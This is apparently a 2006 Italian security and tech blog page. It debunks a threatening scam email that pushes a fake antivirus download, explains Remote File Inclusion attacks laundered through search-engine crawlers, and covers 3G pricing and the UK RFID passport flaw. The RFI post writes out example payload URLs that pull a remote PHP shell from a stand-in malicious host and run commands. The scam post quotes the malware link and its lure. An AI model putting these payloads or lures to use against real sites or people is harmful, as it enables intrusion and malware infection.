Gli spammer si ingegnano: il finto anti virus o la diffida [updated]

spam_visivo1.gifUltimamente le email di spam si sono affinate per riuscire a sorpassare i filtri antispam. Stanno girando email scritte in ASCII art e immagini con sfondi spaziali e testo non allineato sulla medesima riga.

Questa email le batte tutte; è stata redatta in un Italiano perfetto e il tono è di minaccia. Un utente inesperto, potrebbe tranquillamente fidarsi del consiglio ed installare un falso anti virus.

Allego il messaggio intregrale dell’email, che mi è arrivato pochi minuti fa su una mia casella @virgilio.it, sperando che Google e gli altri motori di ricerca lo indicizzino:

From: “avv. gentili e soci? Roma-Gentilitffmza@virgilio.it
To: xxx@virgilio.it
Sent: Thursday, November 30, 2006 05:07 PM
Subject: invii continui

Gentile utente xxxx@virgilio.it,

sono l’avvocato Gianluca Gentili titolare dell’omonimo studio Legale, mi trovo costretto a riscriverle perchè continuano ad arrivarmi dal suo indirizzo email xxxx@virgilio.it messaggi dal contenuto esplicito.
La rimando a tal proposito a esaminare l’ultimo arrivato, che riporto in calce a questo messaggio.
Non sono un esperto informatico, tuttavia il sistemista del nostro studio sostiene che questi invii da parte sua sono probabilmente involontari e causati da un worm informatico.
Dice inoltre che è possibile rimuovere questo worm con il software antivirus scaricabile dall’indirizzo http://www.mycleanpc.biz

Io non ho nè le competenze nè il tempo per verificare l’esattezza di questa supposizione, purtroppo mi trovo cosuretto a DIFFIDARLA dal continuare questi invii offensivi alla mia posta di lavoro.
Se riceverò UN SOLO ALTRO MESSAGGIO di questo genere procederò per vie legali senza ulteriore avviso.

Sospenda questi invii o, se si tratta di un Virus worm, lo disinstalli al più presto perchè sicuramente non sono l’unico che sta ricevendo questa immondizia da lei.

Le ricordo che i reparti di polizia delle telecomunicazioni hanno i mezzi per risalire alla vera identità del proprietario di un indirizzo di posta, per quanto registrato con dati inventati o internazionale. Per cui non creda di poter continuare a inondare la mia casella email con queste pubblicità sconvenienti.

in attesa di un suo urgente riscontro,
saluti cordiali

Studio Legale
Gentili e soci
Via Vittorio Veneto 16
Genova

In aggiunta al messaggio riportato viene anche allegata una delle presunte mail che vengono citate nel testo:

From: xxxx@virgilio.it
To: ‘Studio Gentili e associati’
Sent: Thursday, November 23, 2006 11:32 AM
Subject: spargilo

apri lo zip allegato è un flasgame gay!

eseguilo e fallo girare!!

ci vediamo
xxxx@virgilio.it

Ho effettuato una ricerca tramite i dati forniti nella mail e non sembra esistere nessun avvocato in Italia chiamato Gianluca Gentili. Nella via indicata non esiste nessun studio legale; l’attività commerciale, che contiene nel nome sociale “Gentilii”, più vicina a quell’indirizzo è una gastronomia. :-)

Aggiornamento: anche Attivissimo ha scritto un post sul suo blog a riguardo di queste email. Sempre sul solito sito è possibile trovare un analisi accurata del malaware contenuto nei siti “trappola”.
Ringrazio anche i lettori che mi hanno segnalato le diverse varianti dell’email.

 

Marcia indietro sulle tecnologie mobili

L’utilizzo di Internet da cellulare, o smartphone che sia, è in forte crescita (indagine 3G.co.uk Novembre 2006) grazie anche alle tariffe (semi flat) a costi accettabili.

Nell’ultimo periodo abbiamo assistito ad un massiccio bombardamento da parte di spot Vodafone che pubblicizavano il 3G come alternativa all’ADSL casalinga. Tutti gli operatori italiani propongono tariffe simil flat che comprendono l’utilizzo della rete 3G.
Sembra, però, che si stiano accorgendo che tramite il 3G, l’utente riesce a risparmiare troppi soldi.
Ecco un paio di articoli da leggere: Nokia e il VoIP e operatori mobili contro Google Maps.

Sempre su queste linee, è di oggi la notizia che il Tribunale di Roma ha bocciato l’offerta Vodafone per la portabilità del numero fisso su una SIM mobile. Un brutto segno per chi si aspettava una rivoluzione del settore.

 

Attachi RFI anonimi grazie ai crawler

Un attacco RFI (Remote File Inclusion) sfrutta l’inclusione, senza validazione, di file all’interno di applicativi Web.
Prendendo come esempio http://www.buggedwebsite.com/bugged_page.php?config=page.php, se bugged_page.php includesse il file tramite la variabile $_GET['config'] (o ancora peggio con $config se il Register_global fosse attivo) senza eseguire nessuna verifica sul suo contenuto sarebbe possibile generare url di questo genere ?config=http://www.maliciussite.com/phpshell.txt. In questo modo, sfruttando, un sito esterno sarebbe possibile iniettare nella pagina php in questione qualsiasi tipo di codice.

Questo genere di attacco può essere anonimizzato inserendo la URL, preparata per attaccare l’applicazione da colpire, in una pagina web indicizzata da un qualsiasi motore di ricerca e aspettare che essa venga “letta” da un qualsiasi crawler.
Ad ogni visita il crawler lancierà l’attacco, per conto dell’attaccante, preparato tramite l’URL.
E’ possibile anche usare la cache che i motori di ricerca mantengono per visualizzare i risultati dell’attacco tramite RFI.

Ad esempio ipotizzando di aver preparato una URL contentente questa query string: ?config=http://www.maliciussite.com/phpshell.txt?cmd=ls nella cache del motore di ricerca si troverà il listato dei file contenuti nella stessa directory di bugged_page.php

Questo tipo di attacco è stato recentemente affrontato da SecuriTeam, anche se comparve per la prima volta su PhRack nel 2001.

 

Di nuovo online

Dopo 19 giorni senza linea ADSL, per passare da Tin.it a Telecom Italia (Alice), ora riesco di nuovo a navigare decentemente e senza pagare un esagerazione (vedi offerte gprs/umts di Tre e Wind).

Nei giorni passati ho avuto modo di scrivere un pò di materiale e mettere online, in versione definitiva, un Wiki per la gestione dei miei documenti: wiki.matteocarli.com.

 

Passaporto elettronico Inglese compromesso

The Guardian ha pubblicato un articolo riguardante la compromissione della sicurezza dei passaporti Inglesi con RFID.
L’articolo, avendo fatto molto “rumore”, è stato poi ripreso da quasi tutti i mass-media (anche Italiani).

Riporto una parte dell’articolo tradotta in Italiano:

Gli standard per i nuovi passaporti sono stati dati dall’International Civil Aviation Organisation (ICAO) nel 2003 e sono adottati dai paesi rinucianti (al visto consolare. NdR) e dagli Stati Uniti. L’ICAO suggerì di inserire nel passaporto i dati biometri del volto; tuttavia i paesi potranno inserire le impronte digitali nel futuro. Tutti questi dati sono salvati su un microchip chiamato Radio Frequency Identification (RFID), che può essere interrogato, da una limitata distanza, tramite onde radio. Microchip simili si trovano normalmente in vendita e vengono utilizzati per il controllo industriale.

Sortunatamente l’ICAO suggerì che la chiave necessaria per l’accesso ai dati, salvati sul microchip, doveva essere compresa da, nel seguente ordine, il numero di passaporto, la data di nascita della persona e di scadenza del passaporto, le quali sono comprese nella pagina, del passaporto, chiamata “machine readable zone”. Quando un ufficiale di stato passa un passaporto attaverso il lettore, questo genera la chiave, che gli permette di comunicare con l’RFID. I dati contenuti, comprendenti anche la foto del possessore, sono visualizzati sullo schermo dell’ufficiale. A questo punto, si suppone che il documento sia autentico e super-sicuro. E, come vedremo più avanti, questo è molto importante.

Per maggiori informazioni invito a leggere l’articolo originale.